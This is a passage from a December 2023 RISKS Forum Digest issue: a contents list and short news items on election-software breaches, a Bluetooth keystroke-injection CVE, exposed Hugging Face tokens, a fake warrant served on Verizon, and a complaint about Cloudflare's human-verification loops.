RISKS-LIST: Risks-Forum Digest Saturday 9 December 2023 Volume 33 : Issue 96

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, founder and still moderator

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/33.96>
The current issue can also be found at
<http://www.csl.sri.com/users/risko/risks.txt>

Contents:
Experts Warn of 'Serious Threats' from Election Equipment
Software Breaches (Christia A. Cassidy)
Woman enters MRI with concealed gun, to predictable results
(Gizmodo)
One Year in, it’s Clear the iPhone’s Satellite SOS Feature Is
Saving Lives (BackPacker)
Verizon fell for fake search warrant, gave victim's phone data to stalker
(Ars Technica)
Bluetooth Keyboard attack vector (Apple Insider)
Google calls Drive data loss *fixed*, locks forum threads saying otherwise
(Ars Technica)
Hugging Face API tokens exposed, major projects vulnerable
(The Register)
DC's public library computerized book index crippled, not by malware..
(danny burstein)
The big lie of millions of information security jobs (Ben Rothke)
U.S. indicts alleged Russian hackers for years-long cyber-espionage campaign
against Western countries (TechCrunch)
Unable to verify humanity (Cliff Kilby)
Ego, Fear and Money: How the AI Fuse Was Lit (The NYTimes)
Personal Information Can Be Accessed Through ChatGPT Queries (James Farrell)
Popular Retailers Accused Of Using AI To Illegally Record Customers (Patch)
Bruce Schneier on AI and Spying (via PGN)
I don't give a damn about "you" and AI (Lauren Weinstein)
Re: Guidelines for AI cybersecurity (David Parnas)
Re: Crypto Crashed and Everyone's In Jail. Investors Think It's Coming Back
Anyway. (Martin Ward)
Re: WeWork has failed, leaving damage in its wake (Henry Baker)
Re: PSA: Update Chrome browser now to avoid an exploit already in
Re: Outdated Password Practices are Widespread but so what
(John Levine)
Re: Meta/Facebook profiting from sale of counterfeit U.S. stamps
(John Levine)
Re: G7 and EU countries pitch guidelines (Bob Smith)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Wed, 6 Dec 2023 11:34:35 -0500 (EST)
From: ACM TechNews <technews-editor@acm.org>
Subject: Experts Warn of 'Serious Threats' from Election Equipment
Software Breaches (Christina A. Cassidy)

Christina A. Cassidy, *Associated Press*, 5 Dec 2023

A letter sent Monday by nearly two dozen computer scientists, election
security experts, and voter advocacy organizations to federal authorities
called for a federal probe and a risk assessment of voting machines used
throughout the U.S., saying software breaches have "urgent implications for
the 2024 election and beyond." According to the letter, the breaches
involved efforts to access voting system software in several states and
provide it to allies of former President Donald Trump as they sought to
overturn the results of the 2020 election. The letter stressed that
possession of voting system software could enable people to practice how to
meddle in the 2024 election, allowing them to identify vulnerabilities and
test potential attacks.

------------------------------

Date: Wed, 6 Dec 2023 14:55:28 -0800
From: Lauren Weinstein <lauren@vortex.com>
Subject: Woman enters MRI with concealed gun, to predictable results
(Gizmodo)

https://gizmodo.com/mri-machine-accidents-gun-shot-woman-butt-1851077446

A woman's medical exam turned into a literal pain in the butt, thanks to a
poorly placed firearm. An adverse event report sent to the Food and Drug
Administration earlier this year details an alleged incident where the woman
was shot in the right buttock by her own gun that was activated by a
magnetic resonance imaging (MRI) machine. Thankfully, the injury was
relatively mild and she recovered just fine.

The report was first filed
<https://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfmaude/detail.cfm?mdrfoi__id=17404241&pc=LNH&device_sequence_no=1>
in July by the woman's healthcare provider to the FDA’s Manufacturer and
User Facility Device Experience (MAUDE) database -- a voluntary reporting
system for adverse events tied to medical devices. But the incident appears
to have first been publicly unearthed last week by *The Messenger*.
<https://themessenger.com/health/mri-gun-shot-self-inflicted-injury-prevention>

------------------------------

Date: Fri, 8 Dec 2023 22:07:37 -0500
From: Monty Solomon <monty@roscom.com>
Subject: One Year in, it’s Clear the iPhone’s Satellite SOS Feature Is
Saving Lives (BackPacker)

When Apple introduced the ability to automatically call for help via
satellite in 2022, critics feared it would encourage hikers to be
reckless. But a year later, one of the United States' busiest search and
rescue outfits is praising it -— and other new safety tech from the company
-- as a “game changer.”

https://www.backpacker.com/news-and-events/news/apple-iphone-satellite-sos-saving-hikers-lives/

------------------------------

Date: Fri, 8 Dec 2023 21:49:50 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Verizon fell for fake search warrant, gave victim's
phone data to stalker (Ars Technica)

https://arstechnica.com/?p=1989794

------------------------------

Date: Fri, 8 Dec 2023 22:15:15 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Bluetooth Keyboard attack vector (Apple Insider)

If you're using a Magic Keyboard, you've opened up an attack vector
https://appleinsider.com/articles/23/12/07/if-youre-using-a-magic-keyboard-youve-opened-up-an-attack-vector

CVE-2023-45866: Unauthenticated Bluetooth keystroke-injection in Android,
Linux, macOS and iOS
https://github.com/skysafe/reblog/tree/main/cve-2023-45866

------------------------------

Date: Fri, 8 Dec 2023 21:54:07 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Google calls Drive data loss *fixed*, locks forum
threads saying otherwise (Ars Technica)

https://arstechnica.com/?p=1989435

------------------------------

Date: Tue, 5 Dec 2023 15:13:43 +0800
From: Li Gong <ligongsf@gmail.com>
Subject: Hugging Face API tokens exposed, major projects vulnerable
(The Register)

https://www.theregister.com/2023/12/04/exposed_hugging_face_api_tokens/

------------------------------

Date: Mon, 4 Dec 2023 00:09:57 +0000 ()
From: danny burstein <dannyb@panix.com>
Subject: DC's public library computerized book index crippled,
not by malware

[From dclibrary.org's main web page]

Service Alert

Due to a contract conflict between two software vendors, our DC Public
Library app is currently experiencing functionality limitations,
particularly with the "Search the catalog" and "Popular Titles" features
located at the top. The vendors are working to resolve this issue as soon as
possible. The library's catalog can still be accessed via our website both
on mobile and on desktop, for your convenience

https://www.dclibrary.org/

------------------------------

Date: Mon, 4 Dec 2023 09:31:37 -0500
From: Ben Rothke <brothke@gmail.com>
Subject: The big lie of millions of information security jobs

Based on non-empirical research, there is a notion that there are many
millions of unfilled information security jobs. The reality is that isn't
so.

These reports, created by organizations with a vested interest in those
numbers, create the situation where security boot camps are created to fill
these non-existent jobs.

While there are many open information security jobs, it's not in the
millions or even close to that.

------------------------------

Date: Thu, 7 Dec 2023 21:36:19 -0500
From: Monty Solomon <monty@roscom.com>
Subject: U.S. indicts alleged Russian hackers for years-long cyber
espionage campaign against Western countries (TechCrunch)

https://techcrunch.com/2023/12/07/us-indicts-alleged-russian-hackers-for-years-long-cyber-espionage-campaign-against-western-countries/

------------------------------

Date: Sat, 9 Dec 2023 14:52:16 -0500
From: Cliff Kilby <cliffjkilby@gmail.com>
Subject: Unable to verify humanity

The concept of verifying that a person is attempting to access a resource is
a useful concept for online companies. Scripts and bots can misbehave or be
intentionally directed to exhaust the resources of a server. It is not
unexpected that a company would want to limit the impact of these
activities. Historically, systems like CAPTCHAs and web application firewall
(WAF) session limiters have been used to provide load shedding for these
front end servers. A few years back, there was a study released that
CAPTCHAs were responsible for an inordinate amount of time wasting and
usability reports. CAPTCHA-less CAPTCHA services became popular and still
mostly do the same thing. None of these things are new. What is new is the
trend of CAPTCHA-less services preventing access to people while still
permitting access to scripts and bots. I have had to cancel several online
services recently due to the fact that CloudFlare does not allow me to
utilize their websites. My first reaction, as yours should be, is
"PEBKAC". A quick search for the phrase "cloudflare verify human loop" will
show that it's rather persistent, with issues going back to at least
2022. My current environment is a Linux machine, with local DNS intercepts
and a curated upstream resolver. There are no DNS errors to be found. I have
disabled all the browser privacy features and yet I am unable to verify I am
human. The developer logs are helpfully cleared automatically by CloudFlare,
so that's difficult to intercept, but as best I can tell, I am no longer
human because I refuse to allow my web browser to use WebGL. The risks
associated with a browser getting generic access to a system level driver
(WebGL/Render, WASM, etc) from unverified code (i.e. a webpage) is a hard
no. CloudFlare has no such restriction about verifying code. They
distribute unsigned, unvalidated node.js code directly.
https://developers.cloudflare.com/pages/platform/known-issues. "Download
the delete-all-deployments.zip file by going to the following link:
https://pub-505c82ba1c844ba788b97b1ed9415e75
..<redacted>/delete-all-deployments.zip". I would have expected that the
codecov issue would have put a stop to "click and download this zip", as
should all corporate and private security training.